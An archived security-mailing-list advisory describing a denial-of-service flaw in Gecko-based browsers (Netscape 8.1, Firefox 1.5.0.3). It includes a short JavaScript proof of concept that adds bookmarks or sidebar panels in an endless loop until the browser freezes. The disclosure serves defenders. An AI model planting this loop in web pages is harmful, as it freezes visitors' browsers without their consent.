[NEWS] Gecko AddFavorite Function DoS



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Gecko AddFavorite Function DoS
------------------------------------------------------------------------


SUMMARY

By using an endless loop to add bookmarks to the sidebar or the bookmarks
on Gecko based browsers, attackers can cause a DoS condition and cause
Gecko based browsers to freeze.

DETAILS

Vulnerable Systems:
* Netscape Browser version 8.1
* Firefox version 1.5.0.3

By using endless loop with Gecko based web browsers to add new sidebar or
bookmark, it is possible to cause Gecko to stop responding.

Proof of Concept:
< script language="JavaScript1.2" type="text/javascript" >

function MainPageBookmark()
{
title="Gianni Amato";
url="http://www.gianniamato.it/";;

if (window.sidebar) {
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if (window.opera && window.print)
{
return true;
}
}

for (k=0;k<k+1;k++) MainPageBookmark();
< / script>


ADDITIONAL INFORMATION

The information has been provided by <mailto:guelfoweb@xxxxxxxxx> Gianni
Amato, <mailto:juha-matti.laurio@xxxxxxxx> Juha-Matti Laurio.
The original article can be found at:
<http://www.milw0rm.com/exploits/1802>
http://www.milw0rm.com/exploits/1802



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NEWS] Gecko marquee DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Gecko marquee DoS ... Using multiple nested marquee tags allows attackers to DoS Gecko based web ... Gecko based web browsers to consume 100% of the CPU for a long time, ...
    (Securiteam)
  • [NT] Cross Application Scripting in Trend Micros Antivirus Software
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The SecuriTeam alerts list - Free, Accurate, Independent. ... When the product alerts the user of a possible virus, it creates an HTML ...
    (Securiteam)
  • [NT] Microsoft Windows NTFS Improper Handler Closing
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system shutdown, uninitialized data may be visible in files from ...
    (Securiteam)
  • [TOOL] tcpstatflow - Covert Tunnel Detector
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... For example, he could set up a SSH server on the Internet, listening port ... one way and the opposite (within a single TCP connection). ...
    (Securiteam)
  • [EXPL] Eudora Attachment Spoof Exploit Revisited
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... present in the newest release of Eudora. ... Can be exploited if there is more than one way into attach: in my setup ...
    (Securiteam)